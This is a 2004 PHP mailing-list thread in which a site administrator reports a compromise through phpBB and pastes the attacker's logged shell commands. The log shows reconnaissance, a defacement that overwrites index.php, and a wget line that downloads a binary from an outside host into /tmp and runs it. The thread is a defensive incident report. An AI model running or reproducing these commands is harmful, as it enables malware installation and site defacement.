Re: PHP Exploit via phpBB?

["Paul Aviles" <paul.aviles@xxxxxxxxx>]

John, can you maybe post the IP addresses of where does attacks came from or 
any other related info?

Thanks

-pa


----- Original Message ----- 
From: "John Nichel" <jnichel@xxxxxxxxxx>
To: "PHP Mailing Lists" <php-general@xxxxxxxxxxxxx>
Sent: Wednesday, December 22, 2004 5:46 PM
Subject: Re:  PHP Exploit via phpBB?


> John Holmes wrote:
> > > From: John Nichel <john@xxxxxxxxxxxx>
> >
> >
> > > I'm currently going thru logs from previous days to see if I was getting 
> > > this 'attack' before upgrading to php v4.3.10
> > >
> > > That's why I'm wanted to post this here...just in case it isn't phpBB 
> > > problem.
> >
> >
> > Many people were trying to tie the vulnerabilities with PHP 4.3.9 to this 
> > attack the vulnerabilities in phpBB, but from what I read they were 
> > unrelated. Are you on a shared server at all? It may be possible that 
> > someone else got attacked and took everyone with them...
>
> Yeah, I had been reading about that, but this didn't happen until after I 
> upgraded to 4.3.10.  I had upgraded to phpBB 2.0.11, about two weeks ago. 
> That was confusing the hell out of me...here I was using the most recent 
> versions of both phpBB and PHP 4.x, and it still happened...not to mention 
> it happening about 1.5 hours after upgrading php.  We're on a dedicated 
> box, and my Rush site is the only one running phpBB, and after digging for 
> the rest of today, I found that it was definitely the fault of phpBB. This 
> post was pointed out to me by a list member...
>
> http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513
>
> So I made that change too, even though I *thought* it was changed in 
> v2.0.11.  Course, I probably screwed something up when patching the files. 
> ;) I disabled the system() function too, just in case.  These are all the 
> system calls it made...
>
> echo ___INICIO___;uname -a;echo ___FIM___;
> echo ___INICIO___;cat /proc/cpuinfo;echo ___FIM___;
> echo ___INICIO___;cat /usr/local/apache/conf/httpd.conf;echo ___FIM___;
> echo ___INICIO___;cat /usr/local/apache/;ls;echo ___FIM___;
> echo ___INICIO___;echo hh > hac.hrml;ls;echo ___FIM___;
> echo ___INICIO___;echo H4ck3rSBR ownz your by xdr0p455 > index.php;echo 
> ___FIM___;
> echo ___INICIO___;pwd;echo ___FIM___;
> echo ___INICIO___;pwd;echo ___FIM___;
> echo ___INICIO___;pwd;echo ___FIM___;
> echo ___INICIO___;mv -f index.php 
> /webserver/vhosts/by-tor.com/docs/index.php;echo ___FIM___;
> echo ___INICIO___;cd /tmp;wget 
> http://www.intranorth.com.br/xpl/r0nin;chmod 777 r0nin;./r0nin;echo 
> ___FIM___;
> echo ___INICIO___;pwd;echo ___FIM___;
> echo ___INICIO___;id;echo ___FIM___;
>
> I'm still trying to figure out how it found all the rest of my vhosts on 
> that box.  I see it did a cat /usr/local/apache/conf/httpd.conf to try and 
> read my Apache config file, but mine doesn't live there.  It also 
> downloaded a file from a Brazilian website, and executed it in the /tmp 
> directory...I deleted all of those, but saved one to 'play' with later.
>
> With any luck, someone else will read thru this, and maybe they'll be 
> luckier than I.
>
> --
> By-Tor.com
> ...it's all about the Rush
> http://www.by-tor.com
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
>
> --
> This message has been scanned for viruses and
> dangerous content by MailScanner, and is
> believed to be clean.



--
This message has been scanned for viruses and
dangerous content by MailScanner, and is
believed to be clean.

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php